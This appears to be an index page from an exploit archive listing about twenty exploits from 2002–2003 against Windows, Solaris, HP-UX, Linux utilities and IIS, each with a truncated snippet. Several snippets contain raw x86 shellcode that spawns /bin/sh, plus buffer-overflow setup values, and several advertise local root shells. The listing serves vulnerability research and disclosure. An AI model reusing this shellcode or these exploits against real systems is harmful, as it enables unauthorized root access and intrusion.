SRT2003-04-03-1300 - Interbase ISC_LOCK_ENV overflow

Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team [email protected] Team Lead Contact [email protected] Our Mission: Secure Network Operations offers expertise in Networking, Intrusion Detection Systems IDS, Software Security Validation, and...

MS Windows RPC Locator Service Remote Exploit

Exploit for unknown platform in category remote exploits ============================================= MS Windows RPC Locator Service Remote Exploit ============================================= / rpcexp.c RPC LOCATOR Exploit Autor: Marcin Wolak mail: email protected Last update: 30 march 2003 / ...

Sun SUNWlldap Library Hostname - Local Buffer Overflow

Sun SUNWlldap Library Hostname - Local Buffer Overflow / hoagiesolarisldap.c gcc hoagiesolarisldap.c -o hoagiesolarisldap Author: Andi Greetz to Greuff, philipp and the other hoagie-fellas :- THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE F...

Sun SUNWlldap Library Hostname Buffer Overflow Exploit

Exploit for solaris platform in category local exploits ====================================================== Sun SUNWlldap Library Hostname Buffer Overflow Exploit ====================================================== / hoagiesolarisldap.c gcc hoagiesolarisldap.c -o hoagiesolarisldap Author:...

Microsoft IIS 5.0 - WebDAV Remote

Microsoft IIS 5.0 - WebDAV Remote // / IIS 5.0 WebDAV -Proof of concept- / / Bug: CAN-2003-0109 / / By Roman Medina-Heigl Hernandez / / aka RoMaNSoFt / / Madrid, 23.Mar.2003 / / ================================= / / Public release. Version 1. / / --------------------------------- / // /...

xscreensaver exploit for Redhat 7.3

I think you don't need other comments: / Tested on rh 7.3 using XFree86 xscreensaver vulnerability AUTHORS: Angelo Rosiello Guilecool & deka REQUIRES: X must be run! EFFECTS: local root exploit! deka is leet brother, thank you : MAIL: [email protected] / include stdio.h include string.h include...

File 3.x - Utility Local Memory Allocation

// source: https://www.securityfocus.com/bid/7009/info It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially...

XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (3)

// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. A local attacker can exploi...

GLIBC locale - Format Strings

GLIBC locale - Format Strings / su.c by xp, modified by logikal@efnet - tested on redhat 5 - 7 / include include include include include include include include char shellcode = "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"...

GLIBC locale format strings exploit

Exploit for linux platform in category local exploits =================================== GLIBC locale format strings exploit =================================== / su.c by xp, modified by email protected - tested on redhat 5 - 7 / include include include include include include include include ch...

GLIBC locale - Format Strings

/ su.c by xp, modified by logikal@efnet - tested on redhat 5 - 7 / include include include include include include include include char shellcode = "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a" "\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"...

Melange Chat Server 1.10 - Remote Buffer Overflow

/ Proof of Concept for Melange Chat Server 1.10 a lame remote bof exploit by innerphobia 12/24/02 Credits go to: - iDefense Labs for the advisory - blink for discovering the bug - Irian for the shellcode With careful calculation it is possible to control even the EIP, not just one byte of EIP...

Melange Chat Server 1.10 Remote Buffer Overflow Exploit

Exploit for linux platform in category remote exploits ======================================================= Melange Chat Server 1.10 Remote Buffer Overflow Exploit ======================================================= / Proof of Concept for Melange Chat Server 1.10 a lame remote bof exploit ...

HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation

/ Program : xhpux11isw.c Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell. Complie : cc xhpux11isw.c -o xsw;./xsw not use gcc for some system Usage : ./xsw off Tested : HP-UX B11.11 & HP-UX B11.0 Author : watercloud @ xfocus.org Date : 2002-12-11 Note : Use as your own risk !! / inclu...

HP-UX 11.0/11.11 swxxx Local Root Shell Exploit

Exploit for hp-ux platform in category local exploits =============================================== HP-UX 11.0/11.11 swxxx Local Root Shell Exploit =============================================== / Program : xhpux11isw.c Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell. Complie : cc...

Macromedia Flash 6.0.47.0 - SWRemote Heap Corruption

Macromedia Flash 6.0.47.0 - SWRemote Heap Corruption source: https://www.securityfocus.com/bid/6196/info A buffer overrun condition has been discovered in the SWRemote parameter used in Macromedia Flash objects. By triggering the overrun it is possible for an attacker to corrupt sensitive heap...

New buffer overflow in plaetDNS

hi planetdns http://www.planetdns.netis commercial software package that allows you to turn computer into an Internet server. and be able to create an Internet Name, connect to a web server, FTP, mail server, etc. running on your computer. planetdns is vulnerable has a buffer overflow with a...

Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)

// source: https://www.securityfocus.com/bid/5927/info The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability BID 5408. A local user can use a WMCOPYDATA message to send arbitrary...

efstool.pl

!/usr/bin/perl Another efstool exploit $shell = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89". "\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89". "\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; $ret =0xbfffe590; $buf = 3000; $egg = 2000; $nop = "\x90"; $offset = 0; if @ARGV == 1 $offset = $ARGV0;...

Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error (3)

Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error 3 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...